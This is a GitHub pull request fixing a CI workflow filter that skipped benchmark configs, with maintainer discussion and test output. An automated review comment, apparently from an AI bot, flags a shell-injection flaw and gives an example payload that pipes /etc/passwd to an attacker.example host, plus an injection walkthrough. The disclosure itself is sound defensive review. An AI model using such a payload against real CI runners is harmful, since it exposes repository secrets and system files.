
Fix e2e-tests dropping highest concurrency benchmark configs#1020

Merged

Ankur-singh merged 3 commits into main from nv/fix-e2e-run-test-config-diff
Apr 10, 2026

Conversation

@Ankur-singh
Collaborator

Problem

The e2e-tests.yml workflow silently drops benchmark runs for the highest and median concurrency configs on 8k1k sequence lengths.

Root cause

mark_eval_entries() marks selected entries (highest + median conc for 8k1k) with run-eval=True. The SINGLE job filter then excludes these entries:

# Old filter — excludes run-eval=True from benchmarks
SINGLE = [x for x in d if 'prefill' not in x and not x.get('run-eval', False)]

These excluded configs only appear in the EVALS job, which runs with eval-only: true — meaning no throughput benchmark is ever executed for them.
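The dropped-entry behavior can be reproduced with a tiny sketch. The entries below are illustrative, not the real config data; only the two filter expressions mirror the workflow:

```python
# Illustrative entries; real configs carry many more fields.
configs = [
    {"name": "tp2-8k1k", "conc": 64, "run-eval": True},   # median conc, eval-marked
    {"name": "tp2-8k1k", "conc": 128},                    # unmarked
    {"name": "tp2-8k1k", "conc": 512, "run-eval": True},  # highest conc, eval-marked
]

# Old SINGLE filter: excludes eval-marked entries from the benchmark job
single = [x for x in configs if "prefill" not in x and not x.get("run-eval", False)]
# EVALS job: picks up the eval-marked entries, but runs with eval-only: true
evals = [x for x in configs if x.get("run-eval", False)]

print(len(single), len(evals))  # 1 2 -> two configs are never benchmarked
```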

How run-sweep handles this differently

run-sweep.yml uses process_changelog.py which calls generate_sweep_configs.py test-config with --no-evals for benchmarks and --evals-only for evals in separate passes. This means ALL concurrency values are always benchmarked, and evals are generated independently.

In contrast, e2e-tests.yml generates everything in one pass and then splits — causing the eval-marked entries to be carved out of the benchmark list entirely.
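The difference can be sketched as follows; `mark_eval_entries` and `generate` here are simplified stand-ins for the real scripts, not their actual code:

```python
def mark_eval_entries(entries):
    """Stand-in: mark the highest and median concurrency entries for eval."""
    by_conc = sorted(entries, key=lambda e: e["conc"])
    marked_ids = {id(by_conc[-1]), id(by_conc[len(by_conc) // 2])}
    return [dict(e, **({"run-eval": True} if id(e) in marked_ids else {}))
            for e in entries]

def generate(entries, mode=None):
    """Stand-in for generate_sweep_configs.py test-config with the given flag."""
    if mode == "--no-evals":
        return [dict(e) for e in entries]  # every concurrency benchmarked, no marks
    marked = mark_eval_entries(entries)
    if mode == "--evals-only":
        return [e for e in marked if e.get("run-eval")]  # eval configs only
    return marked  # default: one combined list (the e2e-tests path)

entries = [{"conc": c} for c in (64, 128, 512)]
benchmarks = generate(entries, "--no-evals")  # run-sweep pass 1: all 3 benchmarked
evals = generate(entries, "--evals-only")     # run-sweep pass 2: 2 eval configs
combined = generate(entries)                  # e2e-tests: 3 entries, 2 eval-marked
print(len(benchmarks), len(evals), len(combined))  # 3 2 3
```

Splitting `combined` with the old filter is what carved the two marked entries out of the benchmark list.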

Impact

Across all NVIDIA + AMD configs, 172 benchmark configs were being silently skipped. For example, with minimaxm2.5-fp8-b200-vllm, these 8k1k configs were never benchmarked:

  • tp=2 conc=64 (median)
  • tp=2 conc=512 (highest)
  • tp=4 conc=64 (median)
  • tp=4 conc=512 (highest)

Fix

Remove the run-eval filter from the SINGLE config generation. Since benchmark and eval jobs are separate (SINGLE hardcodes run-eval: false, EVALS hardcodes run-eval: true + eval-only: true), there is no need to exclude eval-marked entries from benchmarks:

# New filter — all single-node configs are benchmarked
SINGLE = [x for x in d if 'prefill' not in x]

Eval-marked entries now run both benchmark (via SINGLE) and eval (via EVALS), which is the correct behavior.
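A minimal check of the fixed split (illustrative entries):

```python
d = [
    {"name": "tp2", "conc": 512, "run-eval": True},
    {"name": "tp2", "conc": 128},
]
# New filter: no run-eval exclusion, so marked entries stay in SINGLE
SINGLE = [x for x in d if "prefill" not in x]
EVALS = [x for x in d if x.get("run-eval", False)]
print(len(SINGLE), len(EVALS))  # 2 1 -> the marked config is benchmarked AND evaluated
```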

Remove run-eval filter from SINGLE job config generation so all
single-node configs are benchmarked regardless of eval marking.
@Oseltamivir
Collaborator

@Ankur-singh Thanks for the catch, having a look rn. Will patch ASAP if indeed broken

Contributor

@claude claude bot left a comment


LGTM — the one-line fix correctly removes the erroneous exclusion from SINGLE, since that job already hardcodes run-eval: false downstream.

Extended reasoning...

Overview

This PR modifies a single line in .github/workflows/e2e-tests.yml, removing the not x.get('run-eval', False) predicate from the SINGLE config filter. No other files are touched.

Security risks

The pre-existing unquoted expression interpolation on lines 55-56 (flagged as an inline comment) is a legitimate injection risk but predates this PR entirely. The one-line change introduced here does not add or worsen any security surface.

Level of scrutiny

This is a low-risk, mechanical fix to a CI workflow filter. The logic is self-evident: SINGLE already passes run-eval: false to the benchmark template unconditionally, so filtering out eval-marked entries beforehand was a bug causing 172 configs to be silently skipped. Removing the filter restores the intended behavior.

Other factors

The description provides a clear root-cause analysis and contrasts the fix with how run-sweep.yml handles the same split correctly. No ambiguity in the intent or implementation.

Comment thread .github/workflows/e2e-tests.yml Outdated
Comment on lines +54 to +57
  pip install pydantic
  CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py \
    ${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }})
- SINGLE=$(echo "$CONFIG_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(json.dumps([x for x in d if 'prefill' not in x and not x.get('run-eval', False)]))")
+ SINGLE=$(echo "$CONFIG_JSON" | python3 -c "import sys,json; d=json.load(sys.stdin); print(json.dumps([x for x in d if 'prefill' not in x]))")
Contributor


🟣 The generate-cli-command input is interpolated directly into the shell command on line 56 without quoting, allowing shell metacharacters in the input to inject arbitrary commands. This is a pre-existing issue unrelated to this PR's change; the fix is to quote the expression: "${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}", or assign it to an environment variable first.

Extended reasoning...

What the bug is and how it manifests

In GitHub Actions, expressions like ${{ inputs.foo }} inside a run: block are string-substituted directly into the shell script text before the shell interprets it. This means if inputs.generate-cli-command contains shell metacharacters — semicolons, backticks, $(...), newlines, etc. — they become part of the raw shell script and execute as commands.

The specific code path that triggers it

Lines 55-56 of .github/workflows/e2e-tests.yml:

CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py \
  ${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }})

The ${{ ... }} expression is unquoted, so its text lands verbatim in the shell script.

Why existing code does not prevent it

There is no input sanitization or validation on generate-cli-command in the workflow definition. The input is declared as a plain type: string with no restrictions, and GitHub Actions does not sanitize expression output in run: contexts. Passing the value via an env: variable is safe only because the shell then reads a variable at runtime and never sees the raw substitution in the script text.

What the impact would be

A crafted input like --flag; curl https://attacker.example/exfil?$(cat /etc/passwd) # would cause the runner to execute the exfiltration command in the CI environment, which has access to repository secrets (e.g., REPO_PAT). GitHub's own security hardening guide explicitly calls this pattern out as a critical injection risk.

How to fix it

Assign the expression to an environment variable and reference the variable in the shell command:

env:
  GENERATE_CLI_CMD: ${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}
run: |
  CONFIG_JSON=$(python3 ${GITHUB_WORKSPACE}/utils/matrix_logic/generate_sweep_configs.py $GENERATE_CLI_CMD)

Or, at minimum, add double quotes: "${{ inputs.generate-cli-command || github.event.inputs.generate-cli-command }}" (which protects against word-splitting and some metacharacters but is not as robust as the env-var approach).

Step-by-step proof

  1. A user with repo write access triggers the workflow with: generate-cli-command = '--config foo; echo INJECTED > /tmp/pwned'
  2. GitHub Actions substitutes the expression, producing the shell script line: CONFIG_JSON=$(python3 .../generate_sweep_configs.py --config foo; echo INJECTED > /tmp/pwned)
  3. The shell sees two commands separated by ;: the python3 invocation, then echo INJECTED > /tmp/pwned.
  4. Both execute; the injection succeeds.

Pre-existing status

This vulnerability predates this PR. The PR only modifies line 57 (removing the run-eval filter from SINGLE), while the vulnerable interpolation is on lines 55-56 and was not changed. It is flagged here because the PR touches the same run: block, making this a natural point to note the issue.

@Oseltamivir
Collaborator

@Ankur-singh

Thanks for the catch once again. That filter was added because --evals-only causes mark_eval_entries() (line 936) to filter down to only eval-marked entries. In that mode, CONFIG_JSON contains only entries with run-eval=True, but with this change SINGLE picks up all non-prefill entries and runs benchmarks for them (with run-eval hardcoded to false), while EVALS runs evals on the same entries. That is wrong: --evals-only should skip benchmarks, but now they run too.

The intention is:

| Flags | mark_eval_entries() runs? | Effect |
| --- | --- | --- |
| Default (no flags) | Yes | Both evals and throughput should run. This SHOULD happen during perf-changelog. Bug this PR fixes: eval-marked 8k1k configs were excluded from SINGLE and only appeared in EVALS with eval-only: true, so no throughput benchmark ran for them. |
| --no-evals | No | No entries get run-eval=True, so the SINGLE filter drops nothing. All configs are benchmarked. No evals run. |
| --evals-only | Yes | Entries without run-eval=True are filtered out entirely (line 936). Only eval-marked configs survive, and they land in EVALS with eval-only: true. Benchmark-only configs SHOULD be discarded. Bug this PR introduces, which the old filter line prevented: SINGLE picks up all non-prefill entries and benchmarks them even though --evals-only should skip benchmarks. |

In default mode, the old filter not x.get('run-eval', False) excluded eval-marked entries from SINGLE. The new logic checks whether all non-prefill entries are eval-marked. In default mode they aren't (only highest/median concurrency 8k1k configs are marked), so all(...) is False and SINGLE includes everything, fixing the original bug.

In --evals-only mode, generate_sweep_configs.py filters to only eval-marked entries, so every non-prefill entry has run-eval=True. all(...) is True, SINGLE becomes [], and no benchmarks run, preserving the intended behavior and preventing the regression.


Quick test:

python3 -c "
import json

def pr_fix_no_guard(d):
    return [x for x in d if 'prefill' not in x]

def our_fix(d):
    s = [x for x in d if 'prefill' not in x]
    return [] if s and all(x.get('run-eval', False) for x in s) else s

def original(d):
    return [x for x in d if 'prefill' not in x and not x.get('run-eval', False)]

evals_only_data = [
    {'name': 'c', 'conc': 256, 'run-eval': True},
    {'name': 'd', 'conc': 512, 'run-eval': True},
]

default_data = [
    {'name': 'a', 'conc': 64},
    {'name': 'b', 'conc': 128},
    {'name': 'c', 'conc': 256, 'run-eval': True},
    {'name': 'd', 'conc': 512, 'run-eval': True},
]

print('=== --evals-only mode (expect SINGLE=0, no benchmarks) ===')
print(f'  main (original):      SINGLE={len(original(evals_only_data))} entries')
print(f'  PR fix (no guard):    SINGLE={len(pr_fix_no_guard(evals_only_data))} entries  <-- REGRESSION: benchmarks run')
print(f'  Our fix (with guard): SINGLE={len(our_fix(evals_only_data))} entries')
print()
print('=== Default mode (expect SINGLE=4, all configs benchmarked) ===')
print(f'  main (original):      SINGLE={len(original(default_data))} entries  <-- BUG: eval-marked configs dropped') 
print(f'  PR fix (no guard):    SINGLE={len(pr_fix_no_guard(default_data))} entries')
print(f'  Our fix (with guard): SINGLE={len(our_fix(default_data))} entries')
"

Output:

=== --evals-only mode (expect SINGLE=0, no benchmarks) ===
  main (original):      SINGLE=0 entries
  PR fix (no guard):    SINGLE=2 entries  <-- REGRESSION: benchmarks run
  Our fix (with guard): SINGLE=0 entries

=== Default mode (expect SINGLE=4, all configs benchmarked) ===
  main (original):      SINGLE=2 entries  <-- BUG: eval-marked configs dropped
  PR fix (no guard):    SINGLE=4 entries
  Our fix (with guard): SINGLE=4 entries

@Ankur-singh
Collaborator Author

@Oseltamivir that makes sense. tysm!

@Oseltamivir
Collaborator

@Ankur-singh Lol my fix has another bug where it fails when a config has only 8k1k with a single concurrency value, because mark_eval_entries marks every entry, making it indistinguishable from --evals-only mode.

I'll just stamp EVAL_ONLY and make the tests more stringent
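One way the stamp could look (hypothetical sketch; the real field name and wiring may differ): the generator emits an explicit EVAL_ONLY flag, so the workflow never has to infer the mode from whether every entry happens to be eval-marked:

```python
def generate(entries, evals_only=False):
    # ...marking logic elided; the point is the explicit mode stamp...
    return {"EVAL_ONLY": evals_only, "entries": entries}

def single_filter(config):
    if config["EVAL_ONLY"]:
        return []  # --evals-only: never benchmark
    return [x for x in config["entries"] if "prefill" not in x]

# A config whose only entry is eval-marked is no longer ambiguous:
all_marked = [{"conc": 512, "run-eval": True}]
print(len(single_filter(generate(all_marked, evals_only=True))))   # 0
print(len(single_filter(generate(all_marked, evals_only=False))))  # 1
```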

Collaborator

@Oseltamivir Oseltamivir left a comment


lgtm

@Oseltamivir
Collaborator

@Ankur-singh I'll merge this in tmr morning after looking at it again when I'm combobulated. Please help me to look through it one more time too.

Thanks so much 🙏🫡

@Ankur-singh Ankur-singh merged commit 68bf34d into main Apr 10, 2026
4 checks passed
@Ankur-singh Ankur-singh deleted the nv/fix-e2e-run-test-config-diff branch April 10, 2026 07:26
@Ankur-singh
Collaborator Author

Ankur-singh commented Apr 10, 2026

Sorry about that 🫣
Please revert!

@Oseltamivir
Collaborator

Lol it's fine, probably good now with stamp of EVAL_ONLY, but will still have a look tmr and PR if smt wrong again

@Ankur-singh
Collaborator Author

We are in this together 😂🤞

JohnQinAMD pushed a commit to JohnQinAMD/InferenceX that referenced this pull request Apr 11, 2026
JohnQinAMD added a commit to JohnQinAMD/InferenceX that referenced this pull request Apr 11, 2026
